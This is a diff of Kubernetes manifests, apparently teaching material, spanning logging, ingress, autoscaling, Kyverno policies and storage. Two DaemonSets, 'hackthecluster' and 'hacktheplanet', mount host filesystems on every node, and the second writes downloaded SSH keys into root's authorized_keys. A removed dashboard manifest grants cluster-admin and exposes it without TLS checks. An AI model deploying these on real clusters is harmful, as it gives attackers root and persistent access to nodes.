spec:
  selector:
    matchLabels:
      k8s-app: filebeat
  template:
    metadata:
      labels:
        k8s-app: filebeat
    spec:
      serviceAccountName: filebeat
      terminationGracePeriodSeconds: 30
      containers:
      - name: filebeat
        image: docker.elastic.co/beats/filebeat-oss:7.0.1
        args: [
          "-c", "/etc/filebeat.yml",
          "-e",
        ]
        env:
        - name: ELASTICSEARCH_HOST
          value: elasticsearch-es.default.svc.cluster.local
        - name: ELASTICSEARCH_PORT
          value: "9200"
        - name: ELASTICSEARCH_USERNAME
          value: elastic
        - name: ELASTICSEARCH_PASSWORD
          value: changeme
        - name: ELASTIC_CLOUD_ID
          value:
        - name: ELASTIC_CLOUD_AUTH
          value:
        securityContext:
          runAsUser: 0
          # If using Red Hat OpenShift uncomment this:
          #privileged: true
        resources:
          limits:
            memory: 200Mi
          requests:
            cpu: 100m
            memory: 100Mi
        volumeMounts:
        - name: config
          mountPath: /etc/filebeat.yml
          readOnly: true
          subPath: filebeat.yml
        - name: inputs
          mountPath: /usr/share/filebeat/inputs.d
          readOnly: true
        - name: data
          mountPath: /usr/share/filebeat/data
        - name: varlibdockercontainers
          mountPath: /var/lib/docker/containers
          readOnly: true
      volumes:
      - name: config
        configMap:
          defaultMode: 0600
          name: filebeat-config
      - name: varlibdockercontainers
        hostPath:
          path: /var/lib/docker/containers
      - name: inputs
        configMap:
          defaultMode: 0600
          name: filebeat-inputs
      # data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
      - name: data
        hostPath:
          path: /var/lib/filebeat-data
          type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: filebeat
subjects:
- kind: ServiceAccount
  name: filebeat
  namespace: kube-system
roleRef:
  kind: ClusterRole
  name: filebeat
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: filebeat
  labels:
    k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
  resources:
  - namespaces
  - pods
  verbs:
  - get
  - watch
  - list
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: filebeat
  namespace: kube-system
  labels:
    k8s-app: filebeat
---
@@ -1,4 +1,4 @@
apiVersion: rbac.authorization.k8s.io/v1beta1
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: kubernetes-dashboard
@@ -11,4 +11,4 @@ roleRef:
subjects:
- kind: ServiceAccount
  name: kubernetes-dashboard
  namespace: kube-system
  namespace: kube-system

34 k8s/hackthecluster.yaml Normal file
@@ -0,0 +1,34 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: hackthecluster
spec:
  selector:
    matchLabels:
      app: hackthecluster
  template:
    metadata:
      labels:
        app: hackthecluster
    spec:
      volumes:
      - name: slash
        hostPath:
          path: /
      tolerations:
      - effect: NoSchedule
        operator: Exists
      containers:
      - name: alpine
        image: alpine
        volumeMounts:
        - name: slash
          mountPath: /hostfs
        command:
        - sleep
        - infinity
        securityContext:
          #privileged: true
          capabilities:
            add:
            - SYS_CHROOT
34 k8s/hacktheplanet.yaml Normal file
@@ -0,0 +1,34 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: hacktheplanet
spec:
  selector:
    matchLabels:
      app: hacktheplanet
  template:
    metadata:
      labels:
        app: hacktheplanet
    spec:
      volumes:
      - name: root
        hostPath:
          path: /root
      tolerations:
      - effect: NoSchedule
        operator: Exists
      initContainers:
      - name: hacktheplanet
        image: alpine
        volumeMounts:
        - name: root
          mountPath: /root
        command:
        - sh
        - -c
        - "mkdir -p /root/.ssh && apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
      containers:
      - name: web
        image: nginx

@@ -9,7 +9,7 @@ spec:
          name: haproxy
      containers:
      - name: haproxy
        image: haproxy
        image: haproxy:1
        volumeMounts:
        - name: config
          mountPath: /usr/local/etc/haproxy/

29 k8s/hpa-v2-pa-httplat.yaml Normal file
@@ -0,0 +1,29 @@
kind: HorizontalPodAutoscaler
apiVersion: autoscaling/v2beta2
metadata:
  name: rng
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: rng
  minReplicas: 1
  maxReplicas: 20
  behavior:
    scaleUp:
      stabilizationWindowSeconds: 60
    scaleDown:
      stabilizationWindowSeconds: 180
  metrics:
  - type: Object
    object:
      describedObject:
        apiVersion: v1
        kind: Service
        name: httplat
      metric:
        name: httplat_latency_seconds
      target:
        type: Value
        value: 0.1

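A hedged usage sketch, assuming the rng Deployment, the httplat Service, and a custom metrics adapter exposing httplat_latency_seconds are all in place:

    kubectl apply -f k8s/hpa-v2-pa-httplat.yaml
    kubectl get hpa rng --watch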
20 k8s/ingress-v1.yaml Normal file
@@ -0,0 +1,20 @@
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: whatever
spec:
  #tls:
  #- secretName: whatever.A.B.C.D.nip.io
  #  hosts:
  #  - whatever.A.B.C.D.nip.io
  rules:
  - host: whatever.A.B.C.D.nip.io
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: whatever
            port:
              number: 1234
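The A.B.C.D placeholders stand for a node address and are meant to be substituted before applying; for example (203.0.113.10 is a made-up documentation address):

    sed s/A.B.C.D/203.0.113.10/g k8s/ingress-v1.yaml | kubectl apply -f -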
17 k8s/ingress-v1beta1.yaml Normal file
@@ -0,0 +1,17 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
  name: whatever
spec:
  #tls:
  #- secretName: whatever.A.B.C.D.nip.io
  #  hosts:
  #  - whatever.A.B.C.D.nip.io
  rules:
  - host: whatever.A.B.C.D.nip.io
    http:
      paths:
      - path: /
        backend:
          serviceName: whatever
          servicePort: 1234
@@ -1,14 +0,0 @@
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: cheddar
spec:
  rules:
  - host: cheddar.A.B.C.D.nip.io
    http:
      paths:
      - path: /
        backend:
          serviceName: cheddar
          servicePort: 80

1 k8s/ingress.yaml Symbolic link
@@ -0,0 +1 @@
ingress-v1beta1.yaml
@@ -1,220 +0,0 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Configuration to deploy release version of the Dashboard UI compatible with
# Kubernetes 1.8.
#
# Example usage: kubectl create -f <this_file>

# ------------------- Dashboard Secret ------------------- #

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-certs
  namespace: kube-system
type: Opaque

---
# ------------------- Dashboard Service Account ------------------- #

apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system

---
# ------------------- Dashboard Role & Role Binding ------------------- #

kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: kubernetes-dashboard-minimal
  namespace: kube-system
rules:
  # Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["create"]
  # Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["create"]
  # Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
  resources: ["secrets"]
  resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
  verbs: ["get", "update", "delete"]
  # Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
  resources: ["configmaps"]
  resourceNames: ["kubernetes-dashboard-settings"]
  verbs: ["get", "update"]
  # Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
  resources: ["services"]
  resourceNames: ["heapster"]
  verbs: ["proxy"]
- apiGroups: [""]
  resources: ["services/proxy"]
  resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
  verbs: ["get"]

---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: kubernetes-dashboard-minimal
  namespace: kube-system
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
  name: kubernetes-dashboard
  namespace: kube-system

---
# ------------------- Dashboard Deployment ------------------- #

kind: Deployment
apiVersion: apps/v1beta2
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: kubernetes-dashboard
  template:
    metadata:
      labels:
        k8s-app: kubernetes-dashboard
    spec:
      containers:
      - name: kubernetes-dashboard
        image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
        ports:
        - containerPort: 8443
          protocol: TCP
        args:
          - --auto-generate-certificates
          # Uncomment the following line to manually specify Kubernetes API server Host
          # If not specified, Dashboard will attempt to auto discover the API server and connect
          # to it. Uncomment only if the default does not work.
          # - --apiserver-host=http://my-address:port
        volumeMounts:
        - name: kubernetes-dashboard-certs
          mountPath: /certs
          # Create on-disk volume to store exec logs
        - mountPath: /tmp
          name: tmp-volume
        livenessProbe:
          httpGet:
            scheme: HTTPS
            path: /
            port: 8443
          initialDelaySeconds: 30
          timeoutSeconds: 30
      volumes:
      - name: kubernetes-dashboard-certs
        secret:
          secretName: kubernetes-dashboard-certs
      - name: tmp-volume
        emptyDir: {}
      serviceAccountName: kubernetes-dashboard
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
      - key: node-role.kubernetes.io/master
        effect: NoSchedule

---
# ------------------- Dashboard Service ------------------- #

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system
spec:
  ports:
    - port: 443
      targetPort: 8443
  selector:
    k8s-app: kubernetes-dashboard
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  labels:
    app: dashboard
  name: dashboard
spec:
  selector:
    matchLabels:
      app: dashboard
  template:
    metadata:
      labels:
        app: dashboard
    spec:
      containers:
      - args:
        - sh
        - -c
        - apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kube-system:443,verify=0
        image: alpine
        name: dashboard
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: dashboard
  name: dashboard
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: dashboard
  type: NodePort
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: kubernetes-dashboard
  labels:
    k8s-app: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: kubernetes-dashboard
  namespace: kube-system
@@ -1,5 +1,5 @@
apiVersion: v1
Kind: Pod
kind: Pod
metadata:
  name: hello
  namespace: default

@@ -1,167 +0,0 @@
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Configuration to deploy release version of the Dashboard UI compatible with
# Kubernetes 1.8.
#
# Example usage: kubectl create -f <this_file>

# ------------------- Dashboard Secret ------------------- #

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-certs
  namespace: kube-system
type: Opaque

---
# ------------------- Dashboard Service Account ------------------- #

apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system

---
# ------------------- Dashboard Role & Role Binding ------------------- #

kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: kubernetes-dashboard-minimal
  namespace: kube-system
rules:
  # Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["create"]
  # Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["create"]
  # Allow Dashboard to get, update and delete Dashboard exclusive secrets.
- apiGroups: [""]
  resources: ["secrets"]
  resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
  verbs: ["get", "update", "delete"]
  # Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
- apiGroups: [""]
  resources: ["configmaps"]
  resourceNames: ["kubernetes-dashboard-settings"]
  verbs: ["get", "update"]
  # Allow Dashboard to get metrics from heapster.
- apiGroups: [""]
  resources: ["services"]
  resourceNames: ["heapster"]
  verbs: ["proxy"]
- apiGroups: [""]
  resources: ["services/proxy"]
  resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
  verbs: ["get"]

---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: kubernetes-dashboard-minimal
  namespace: kube-system
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: kubernetes-dashboard-minimal
subjects:
- kind: ServiceAccount
  name: kubernetes-dashboard
  namespace: kube-system

---
# ------------------- Dashboard Deployment ------------------- #

kind: Deployment
apiVersion: apps/v1beta2
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: kubernetes-dashboard
  template:
    metadata:
      labels:
        k8s-app: kubernetes-dashboard
    spec:
      containers:
      - name: kubernetes-dashboard
        image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
        ports:
        - containerPort: 8443
          protocol: TCP
        args:
          - --auto-generate-certificates
          # Uncomment the following line to manually specify Kubernetes API server Host
          # If not specified, Dashboard will attempt to auto discover the API server and connect
          # to it. Uncomment only if the default does not work.
          # - --apiserver-host=http://my-address:port
        volumeMounts:
        - name: kubernetes-dashboard-certs
          mountPath: /certs
          # Create on-disk volume to store exec logs
        - mountPath: /tmp
          name: tmp-volume
        livenessProbe:
          httpGet:
            scheme: HTTPS
            path: /
            port: 8443
          initialDelaySeconds: 30
          timeoutSeconds: 30
      volumes:
      - name: kubernetes-dashboard-certs
        secret:
          secretName: kubernetes-dashboard-certs
      - name: tmp-volume
        emptyDir: {}
      serviceAccountName: kubernetes-dashboard
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
      - key: node-role.kubernetes.io/master
        effect: NoSchedule

---
# ------------------- Dashboard Service ------------------- #

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kube-system
spec:
  ports:
    - port: 443
      targetPort: 8443
  selector:
    k8s-app: kubernetes-dashboard
63 k8s/kyverno-namespace-setup.yaml Normal file
@@ -0,0 +1,63 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: setup-namespace
spec:
  rules:
  - name: setup-limitrange
    match:
      resources:
        kinds:
        - Namespace
    generate:
      kind: LimitRange
      name: default-limitrange
      namespace: "{{request.object.metadata.name}}"
      data:
        spec:
          limits:
          - type: Container
            min:
              cpu: 0.1
              memory: 0.1
            max:
              cpu: 2
              memory: 2Gi
            default:
              cpu: 0.25
              memory: 500Mi
            defaultRequest:
              cpu: 0.25
              memory: 250Mi
  - name: setup-resourcequota
    match:
      resources:
        kinds:
        - Namespace
    generate:
      kind: ResourceQuota
      name: default-resourcequota
      namespace: "{{request.object.metadata.name}}"
      data:
        spec:
          hard:
            requests.cpu: "10"
            requests.memory: 10Gi
            limits.cpu: "20"
            limits.memory: 20Gi
  - name: setup-networkpolicy
    match:
      resources:
        kinds:
        - Namespace
    generate:
      kind: NetworkPolicy
      name: default-networkpolicy
      namespace: "{{request.object.metadata.name}}"
      data:
        spec:
          podSelector: {}
          ingress:
          - from:
            - podSelector: {}

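A quick way to watch the three generate rules fire (a sketch, assuming Kyverno is installed): create a namespace, then list the resources that should appear in it:

    kubectl create namespace test-kyverno
    kubectl --namespace=test-kyverno get limitranges,resourcequotas,networkpolicies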
22 k8s/kyverno-pod-color-1.yaml Normal file
@@ -0,0 +1,22 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: pod-color-policy-1
spec:
  validationFailureAction: enforce
  rules:
  - name: ensure-pod-color-is-valid
    match:
      resources:
        kinds:
        - Pod
        selector:
          matchExpressions:
          - key: color
            operator: Exists
          - key: color
            operator: NotIn
            values: [ red, green, blue ]
    validate:
      message: "If it exists, the label color must be red, green, or blue."
      deny: {}
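A sketch of how this validation policy could be exercised (assuming Kyverno is installed): a pod with an invalid color label should be rejected, a valid one admitted:

    kubectl run purple --image=nginx --labels=color=purple   # should be denied
    kubectl run blue --image=nginx --labels=color=blue       # should be admitted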
21 k8s/kyverno-pod-color-2.yaml Normal file
@@ -0,0 +1,21 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: pod-color-policy-2
spec:
  validationFailureAction: enforce
  background: false
  rules:
  - name: prevent-color-change
    match:
      resources:
        kinds:
        - Pod
    validate:
      message: "Once label color has been added, it cannot be changed."
      deny:
        conditions:
        - key: "{{ request.oldObject.metadata.labels.color }}"
          operator: NotEqual
          value: "{{ request.object.metadata.labels.color }}"

25 k8s/kyverno-pod-color-3.yaml Normal file
@@ -0,0 +1,25 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: pod-color-policy-3
spec:
  validationFailureAction: enforce
  background: false
  rules:
  - name: prevent-color-removal
    match:
      resources:
        kinds:
        - Pod
        selector:
          matchExpressions:
          - key: color
            operator: DoesNotExist
    validate:
      message: "Once label color has been added, it cannot be removed."
      deny:
        conditions:
        - key: "{{ request.oldObject.metadata.labels.color }}"
          operator: NotIn
          value: []

160 k8s/local-path-storage.yaml Normal file
@@ -0,0 +1,160 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
apiVersion: v1
kind: Namespace
metadata:
  name: local-path-storage

---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: local-path-provisioner-service-account
  namespace: local-path-storage

---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: local-path-provisioner-role
rules:
- apiGroups: [ "" ]
  resources: [ "nodes", "persistentvolumeclaims", "configmaps" ]
  verbs: [ "get", "list", "watch" ]
- apiGroups: [ "" ]
  resources: [ "endpoints", "persistentvolumes", "pods" ]
  verbs: [ "*" ]
- apiGroups: [ "" ]
  resources: [ "events" ]
  verbs: [ "create", "patch" ]
- apiGroups: [ "storage.k8s.io" ]
  resources: [ "storageclasses" ]
  verbs: [ "get", "list", "watch" ]

---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: local-path-provisioner-bind
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
  name: local-path-provisioner-service-account
  namespace: local-path-storage

---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: local-path-provisioner
  namespace: local-path-storage
spec:
  replicas: 1
  selector:
    matchLabels:
      app: local-path-provisioner
  template:
    metadata:
      labels:
        app: local-path-provisioner
    spec:
      serviceAccountName: local-path-provisioner-service-account
      containers:
      - name: local-path-provisioner
        image: rancher/local-path-provisioner:v0.0.19
        imagePullPolicy: IfNotPresent
        command:
        - local-path-provisioner
        - --debug
        - start
        - --config
        - /etc/config/config.json
        volumeMounts:
        - name: config-volume
          mountPath: /etc/config/
        env:
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
      volumes:
      - name: config-volume
        configMap:
          name: local-path-config

---
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: local-path
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete

---
kind: ConfigMap
apiVersion: v1
metadata:
  name: local-path-config
  namespace: local-path-storage
data:
  config.json: |-
    {
      "nodePathMap":[
        {
          "node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
          "paths":["/opt/local-path-provisioner"]
        }
      ]
    }
  setup: |-
    #!/bin/sh
    while getopts "m:s:p:" opt
    do
      case $opt in
        p)
          absolutePath=$OPTARG
          ;;
        s)
          sizeInBytes=$OPTARG
          ;;
        m)
          volMode=$OPTARG
          ;;
      esac
    done

    mkdir -m 0777 -p ${absolutePath}
  teardown: |-
    #!/bin/sh
    while getopts "m:s:p:" opt
    do
      case $opt in
        p)
          absolutePath=$OPTARG
          ;;
        s)
          sizeInBytes=$OPTARG
          ;;
        m)
          volMode=$OPTARG
          ;;
      esac
    done

    rm -rf ${absolutePath}
  helperPod.yaml: |-
    apiVersion: v1
    kind: Pod
    metadata:
      name: helper-pod
    spec:
      containers:
      - name: helper-pod
        image: busybox


@@ -1,32 +1,61 @@
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
# This file is https://github.com/kubernetes-sigs/metrics-server/releases/latest/download/components.yaml
# But with the following arguments added to metrics-server:
# args:
# - --kubelet-insecure-tls
# - --metric-resolution=5s
apiVersion: v1
kind: ServiceAccount
metadata:
  name: system:aggregated-metrics-reader
  labels:
    rbac.authorization.k8s.io/aggregate-to-view: "true"
    rbac.authorization.k8s.io/aggregate-to-edit: "true"
    rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: metrics-server:system:auth-delegator
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:auth-delegator
subjects:
- kind: ServiceAccount
    k8s-app: metrics-server
  name: metrics-server
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1beta1
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  labels:
    k8s-app: metrics-server
    rbac.authorization.k8s.io/aggregate-to-admin: "true"
    rbac.authorization.k8s.io/aggregate-to-edit: "true"
    rbac.authorization.k8s.io/aggregate-to-view: "true"
  name: system:aggregated-metrics-reader
rules:
- apiGroups:
  - metrics.k8s.io
  resources:
  - pods
  - nodes
  verbs:
  - get
  - list
  - watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  labels:
    k8s-app: metrics-server
  name: system:metrics-server
rules:
- apiGroups:
  - ""
  resources:
  - pods
  - nodes
  - nodes/stats
  - namespaces
  - configmaps
  verbs:
  - get
  - list
  - watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  labels:
    k8s-app: metrics-server
  name: metrics-server-auth-reader
  namespace: kube-system
roleRef:
@@ -38,95 +67,26 @@ subjects:
  name: metrics-server
  namespace: kube-system
---
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
  name: v1beta1.metrics.k8s.io
spec:
  service:
    name: metrics-server
    namespace: kube-system
  group: metrics.k8s.io
  version: v1beta1
  insecureSkipTLSVerify: true
  groupPriorityMinimum: 100
  versionPriority: 100
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: metrics-server
  namespace: kube-system
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: metrics-server
  namespace: kube-system
  labels:
    k8s-app: metrics-server
spec:
  selector:
    matchLabels:
      k8s-app: metrics-server
  template:
    metadata:
      name: metrics-server
      labels:
        k8s-app: metrics-server
    spec:
      serviceAccountName: metrics-server
      volumes:
      # mount in tmp so we can safely use from-scratch images and/or read-only containers
      - name: tmp-dir
        emptyDir: {}
      containers:
      - name: metrics-server
        image: k8s.gcr.io/metrics-server-amd64:v0.3.1
        imagePullPolicy: Always
        volumeMounts:
        - name: tmp-dir
          mountPath: /tmp
        args:
        - --kubelet-preferred-address-types=InternalIP
        - --kubelet-insecure-tls
        - --metric-resolution=5s
---
apiVersion: v1
kind: Service
metadata:
  name: metrics-server
  namespace: kube-system
  labels:
    kubernetes.io/name: "Metrics-server"
spec:
  selector:
    k8s-app: metrics-server
  ports:
  - port: 443
    protocol: TCP
    targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
kind: ClusterRoleBinding
metadata:
  name: system:metrics-server
rules:
- apiGroups:
  - ""
  resources:
  - pods
  - nodes
  - nodes/stats
  verbs:
  - get
  - list
  - watch
  labels:
    k8s-app: metrics-server
  name: metrics-server:system:auth-delegator
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:auth-delegator
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  labels:
    k8s-app: metrics-server
  name: system:metrics-server
roleRef:
  apiGroup: rbac.authorization.k8s.io
@@ -136,3 +96,98 @@ subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
---
apiVersion: v1
kind: Service
metadata:
  labels:
    k8s-app: metrics-server
  name: metrics-server
  namespace: kube-system
spec:
  ports:
  - name: https
    port: 443
    protocol: TCP
    targetPort: https
  selector:
    k8s-app: metrics-server
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    k8s-app: metrics-server
  name: metrics-server
  namespace: kube-system
spec:
  selector:
    matchLabels:
      k8s-app: metrics-server
  strategy:
    rollingUpdate:
      maxUnavailable: 0
  template:
    metadata:
      labels:
        k8s-app: metrics-server
    spec:
      containers:
      - args:
        - --cert-dir=/tmp
        - --secure-port=4443
        - --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
        - --kubelet-use-node-status-port
        - --kubelet-insecure-tls
        - --metric-resolution=5s
        image: k8s.gcr.io/metrics-server/metrics-server:v0.4.3
        imagePullPolicy: IfNotPresent
        livenessProbe:
          failureThreshold: 3
          httpGet:
            path: /livez
            port: https
            scheme: HTTPS
          periodSeconds: 10
        name: metrics-server
        ports:
        - containerPort: 4443
          name: https
          protocol: TCP
        readinessProbe:
          failureThreshold: 3
          httpGet:
            path: /readyz
            port: https
            scheme: HTTPS
          periodSeconds: 10
        securityContext:
          readOnlyRootFilesystem: true
          runAsNonRoot: true
          runAsUser: 1000
        volumeMounts:
        - mountPath: /tmp
          name: tmp-dir
      nodeSelector:
        kubernetes.io/os: linux
      priorityClassName: system-cluster-critical
      serviceAccountName: metrics-server
      volumes:
      - emptyDir: {}
        name: tmp-dir
---
apiVersion: apiregistration.k8s.io/v1
kind: APIService
metadata:
  labels:
    k8s-app: metrics-server
  name: v1beta1.metrics.k8s.io
spec:
  group: metrics.k8s.io
  groupPriorityMinimum: 100
  insecureSkipTLSVerify: true
  service:
    name: metrics-server
    namespace: kube-system
  version: v1beta1
  versionPriority: 100
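Once the updated metrics-server is deployed, resource metrics should start flowing after a few --metric-resolution intervals. A quick check, assuming a working cluster:

    kubectl get apiservice v1beta1.metrics.k8s.io
    kubectl top nodes
    kubectl top pods --all-namespaces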
k8s/nginx-1-without-volume.yaml (new file, 8 lines)
@@ -0,0 +1,8 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-without-volume
spec:
  containers:
  - name: nginx
    image: nginx
k8s/nginx-2-with-volume.yaml (new file, 13 lines)
@@ -0,0 +1,13 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-with-volume
spec:
  volumes:
  - name: www
  containers:
  - name: nginx
    image: nginx
    volumeMounts:
    - name: www
      mountPath: /usr/share/nginx/html/
k8s/nginx-3-with-git.yaml (new file, 21 lines)
@@ -0,0 +1,21 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-with-git
spec:
  volumes:
  - name: www
  containers:
  - name: nginx
    image: nginx
    volumeMounts:
    - name: www
      mountPath: /usr/share/nginx/html/
  - name: git
    image: alpine
    command: [ "sh", "-c", "apk add git && git clone https://github.com/octocat/Spoon-Knife /www" ]
    volumeMounts:
    - name: www
      mountPath: /www/
  restartPolicy: OnFailure
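Both containers in nginx-with-git mount the same www volume, so the content cloned by the git container should be visible from the nginx container. One way to check, assuming the pod is running:

    kubectl exec nginx-with-git -c nginx -- ls -l /usr/share/nginx/html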
@@ -1,7 +1,7 @@
apiVersion: v1
kind: Pod
metadata:
  name: nginx-with-volume
  name: nginx-with-init
spec:
  volumes:
  - name: www
@@ -11,11 +11,10 @@ spec:
    volumeMounts:
    - name: www
      mountPath: /usr/share/nginx/html/
  initContainers:
  - name: git
    image: alpine
    command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
    command: [ "sh", "-c", "apk add git && sleep 5 && git clone https://github.com/octocat/Spoon-Knife /www" ]
    volumeMounts:
    - name: www
      mountPath: /www/
  restartPolicy: OnFailure
k8s/openebs-pod.yaml (new file, 24 lines)
@@ -0,0 +1,24 @@
apiVersion: v1
kind: Pod
metadata:
  name: openebs-local-hostpath-pod
spec:
  volumes:
  - name: storage
    persistentVolumeClaim:
      claimName: local-hostpath-pvc
  containers:
  - name: better
    image: alpine
    command:
    - sh
    - -c
    - |
      while true; do
        echo "$(date) [$(hostname)] Kubernetes is better with PVs." >> /mnt/storage/greet.txt
        sleep $(($RANDOM % 5 + 20))
      done
    volumeMounts:
